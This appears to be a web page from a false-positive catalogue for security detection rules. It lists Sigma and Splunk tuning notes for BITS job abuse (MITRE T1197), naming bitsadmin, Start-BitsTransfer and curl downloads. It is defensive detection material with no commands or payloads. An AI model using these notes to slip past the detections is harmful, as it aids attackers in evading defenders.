LoFP
/
t1197
t1197
Title
Tags
administrator powershell scripts
t1078
t1197
windows
sigma
limited false positives will be present. typically, applications will use `bitsadmin.exe`. any filtering should be done based on command-line arguments (legitimate applications) or parent process.
t1197
endpoint
splunk
limited false positives, however it may be required to filter based on parent process name or network connection.
t1105
t1197
endpoint
splunk
limited false positives. it is possible administrators will utilize start-bitstransfer for administrative tasks, otherwise filter based parent process or command-line arguments.
t1197
endpoint
splunk
many legitimate applications or scripts could leverage \"bitsadmin\". this event is best correlated with eid 16403 via the jobid field
t1197
windows
sigma
rare programs that use bitsadmin and update from regional tlds e.g. .uk or .ca
t1071
t1071.001
t1197
sigma
some legitimate apps use this, but limited.
t1036
t1036.003
t1197
windows
sigma
some system administrators or development teams may use tools like curl or powershell to download files from public services for legitimate automation or scripting purposes. however, use of these binaries to contact domains commonly associated with file sharing or temporary hosting should be carefully reviewed, as such services are frequently abused by threat actors for malware delivery and staging. tuning by domain allowlisting or internal usage policies is recommended.
t1197
endpoint
splunk
this rule doesn't exclude other known tlds such as \".org\" or \".net\". it's recommended to apply additional filters for software and scripts that leverage the bits service
t1197
windows
sigma
usage of these flags to reach public ips or uncommon destinations should be reviewed. tuning may be required for domains with known certificate issues.
t1197
endpoint
splunk
while the file extensions in question can be suspicious at times. it's best to add filters according to your environment to avoid large amount false positives
t1197
windows
sigma
LoFP
/
t1197